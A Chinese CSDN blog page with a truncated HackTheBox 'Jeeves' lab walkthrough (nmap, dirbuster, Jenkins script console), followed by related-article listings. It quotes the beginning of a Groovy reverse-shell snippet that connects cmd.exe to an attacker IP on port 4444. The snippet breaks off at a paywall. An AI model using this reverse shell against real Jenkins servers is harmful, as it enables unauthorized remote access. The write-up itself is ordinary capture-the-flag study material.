Hackthebox -jeeves(考点:jenkins安全/kdbx文件/smb登录)

最新推荐文章于 2024-04-26 09:49:13 发布
最新推荐文章于 2024-04-26 09:49:13 发布
阅读量889 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45527786/article/details/105342265
版权
本文详细介绍了在Hackthebox平台上的Jeeves挑战,主要涉及Jenkins的安全漏洞利用、通过dirbuster扫描发现jenkins服务,使用script console进行渗透,并探讨了利用keepass2的kdbx文件进行提权的过程,最终通过smb服务获取管理员权限。
摘要由CSDN通过智能技术生成

1、nmap 扫起

在这里插入图片描述可见445smb,先nmap脚本看一看
nmap -p 445 --script vuln 10.10.10.63
在这里插入图片描述

似乎没什么
另外看到端口50000,理论上冷门高端口应该是就是突破点

2、jekins渗透

dirbuster扫目录
在这里插入图片描述

扫到askjeeves ,进去看到是jenkins,

在这里插入图片描述那就根据脚本script console来突破了,在manage里找到script console
在这里插入图片描述
渗透方法
根据里面的方法来,修改ip等

String host="10.10.14.2";
int port=4444;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s
最低0.47元/天 解锁文章
冬萍子
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
kdbx后缀文件打开
墨痕诉清风的博客
05-31 2797
KDBX 格式是在KeePass的版本2中引入的。以前的版本使用了.KDB 格式。KeePass 2可以导入旧的KDB文件,也可以导出为KDB格式。注意:KeePass的Mac和Linux版本被称为KeePassX。但是,此版本尚不支持.KDBX 格式。windows 使用 KeePass 工具打开(资源已上传到附件)kali 使用 keepass2 工具打开。.kdbx 文件是数据文件文件名:abc.kdbx。
keepass.py:用于读取 kdbx 文件的后端和命令行工具
07-07
keepass.py 用于读取 kdbx 文件的后端和命令行工具 使用作为实现格式的文档。 不幸的是,该链接上的数据不完整,导致实施无法正常工作。
Hack The Box——Monteverde
江左盟的博客
06-20 516
目录 简介 信息收集 端口扫描与服务识别 枚举域信息 漏洞发现 暴力破解弱口令 漏洞利用 获得域用户密码 权限提升 总结 简介 该靶机又是一台简单的Windows Azure Active Directory域控主机。通过枚举域用户smb服务发现弱口令,进一步通过共享文件夹泄漏的域用户mhope的密码登录域控主机,接着利用Azure Admins组的权限查询SQLServer中存储的域管理员的密码,进而获得域管理员权限。 信息收集 端口扫描与服务识别 使用nmap 10.10.
探索 KeeWeb: 在线KDBX管理器,安全存储您的密码
最新发布
gitblog_00030的博客
04-26 373
探索 KeeWeb: 在线KDBX管理器,安全存储您的密码 项目地址:https://gitcode.com/keeweb/kdbxweb 在这个数字化的时代,我们的生活依赖于各种在线账户,每个账户都可能有自己的密码。为了保护这些信息的安全,一个强大的密码管理工具是必不可少的。KeeWeb 是一款开源、跨平台的在线密码管理应用,支持KDBX文件格式,让您能够轻松、安全地管理和访问您的密码库。 项...
VulnHub—DriftingBlues: 5
Cobra的博客
04-06 1879
一、信息收集 1、使用nmap扫描存活主机 2、发现192.168.189.158开放了80和22端口,访问其80端口 3、发现是用wordpress搭建的站点,对其进行目录扫描发现wordpress后台 4、尝试使用wpscan对用户名和密码进行爆破 先用cewl生成相应的字典 cewl -m 6 -w passwd.txt http://192.168.189.158/ 成功爆出一个用户的密码 5、使用改用户登录之后发现一张跟靶机主题相关的图片 6.
内存取证CTF-Memlabs靶场2
qq_42947816的博客
02-01 1360
MemLabs 是一组具有教育意义的介绍性 CTF 式挑战,旨在鼓励学生、安全研究人员以及 CTF 玩家开始使用内存取证领域。
hooke-Jeeves 算法:hooke-Jeeves 算法-matlab开发
05-29
**Hook-Jeeves 算法详解及其在 MATLAB 中的实现** Hook-Jeeves 算法是一种简单而直观的优化方法,主要用于寻找多维函数的局部极小值。该算法由 David Hooke 和 John Jeeves 在1961年提出,主要用于解决无约束优化...
db-jeeves:POC SaaS消除了为Web相关项目配置环境的麻烦
03-31
通过下载并解压db-jeeves-master,开发者可以深入了解该项目的架构,学习如何利用其API来构建Web应用,以及如何根据自己的需求对其进行定制和扩展。 总的来说,db-jeeves作为一款POC SaaS产品,致力于解决Web项目中...
Hooke-Jeeves 算法演示:Hooke-jeeves 算法(1961)适用于低维无约束优化问题。-matlab开发
05-29
MATLAB的`testHookeJeeves.m.zip`文件很可能包含了上述步骤的源代码,你可以解压并运行这个脚本来实际体验Hooke-Jeeves算法的运作过程。在实际应用中,Hooke-Jeeves算法可能不如更现代的优化算法如梯度下降法或拟...
hkjeeves.rar_ Hooke Jeeves_HOOKE-JEEVES_Hooke Jeeves_Jeeves
07-14
Hooke-Jeeves 方向搜索法是一种经典的数值优化方法,主要用于在多维空间中寻找函数的局部极小值。这种方法由Hooke和Jeeves在1960年代提出,适用于那些没有解析解或者梯度信息不明确的问题。在机器学习、工程计算以及...
kdbx.dart:采用纯Dart的KeepassX格式实现
05-17
kdbx.dart 采用纯Dart的KeepassX格式实现。 查看使用此库的应用程序的。 资源 代码很大程度上基于 用法 去做 功能和错误 通过本地dart实现支持kdbx v3 通过结合支持kdbx v4 Argon2支持 根目录包含共享的libraris(libargon2 *),它们是从构建的 苹果系统: argon2_ffi / ios /类 cmake . && cmake --build . cp libargon2_ffi.dylib kdbx.dart/ 可能需要运行: codesign --remove-signature /usr/local/bin/dart Linux: argon2_ffi / ios /类 cmake . && cmake --build . cp libargon2_ffi.so kdbx.dart/ 视窗: 在C ++
keepass-diff:用来区分Keepass(.kdbx)文件的CLI工具。 如果与Dropbox或NextCloud同步并由于冲突而获取多个文件,则很有用
05-22
此CLI工具比较两个Keepass(.kdbx)文件并打印它们之间的差异。 安装 RUSTFLAGS="-C target-cpu=native" cargo install keepass-diff RUSTFLAGS变量将大大提高性能。 请参阅。 用法 keepass-diff <file> <file> CLI会分别询问两个文件的密码。 提供密码 您还可以在命令行上提供一个或两个密码(请注意,这会将密码公开给登录到系统的其他用户): keepass-diff <file> <file> --password-a <password> --password-b <password> 如果文件具有相同的密码,则可以使用--passwords <password>标志。 请注意,这与上述问题相同: keepass-diff <file> <file-
Hooke-Jeeves.rar_HOOKE-JEEVES_Hooke_Jeeve PUDN_filter_hooke matl
07-14
用Matlab编写的用Hooke-Jeeves方法求函数极小点程序
idea使用帮助文档18(Git)
qq_38963960的博客
05-05 1901
Git# 为了能够使用的Git版本控制,确保了Git的整合插件在启用设置/首选项对话框(Ctrl+Alt+S)下的插件。 在为现有本地项目启用Git版本控制或从远程存储库克隆Git项目之前,请执行以下操作: 下载并安装Git。支持最低版本的Windows为2.4,Linux和MacOS为1.8.0.0。 在Settings / Preferences对话框(Ctrl+A...
2022DASCTF Apr X FATE 熟悉的猫
qq_61620566的博客
05-05 452
文件解压,flag.zip和len5.kdbx 这里不要用Windows自带的解压方式打开,flag.zip否则会报错,如上所示,用bandzip 解压到桌面,接着.kdbx文件用专门的软件打开:链接:https://keepass.info/news/n220109_2.50.html 将.kdbx 文件放到kali下,用kali卡里自带的解密工具keepass2john 获取文件的hash,这里注意我用箭头标注的地方,之前有一段字母,要去掉之后才能解密,即len5之前的内容全...
HTB-Jeeves
TA不懒,但还没有添加简介
04-14 491
HTB-Jeeves
HTB_Pennyworth 靶机之命令&代码执行与反弹shell
网络安全学习
05-29 1010
本次通过分析 jenkins 组件学习渗透测试流程,最终通过代码执行漏洞拿到 shell 信息收集 日常扫描,nmap -sV -v ,发现开放 8080 端口 Jenkins是一个独立的开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台,使软件的持续集成变成可能 持续集成:简单来说,有时候做项目,各个模块单独测试时都是能用的,但是上线前将所有模块集成到一起之后跑不通了,此时修改就为时晚矣,所以在模块开发时,就尽早将模块整合,持续不断的集成新模.
HackTheBox-Jeeves
网安星空
01-10 455
HackTheBox 网站CTF靶场PWN相关题目Jeeves,主要知识点为缓冲区溢出
hooke-jeeves法matlab
09-26
hooke-jeeves方法是一种数值优化算法,用于寻找非约束优化问题的最小值。在MATLAB中,可以使用fminsearch函数来实现hooke-jeeves方法,该函数可以接受函数句柄和初始点作为输入,并返回找到的最优解和最小值。 ###...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值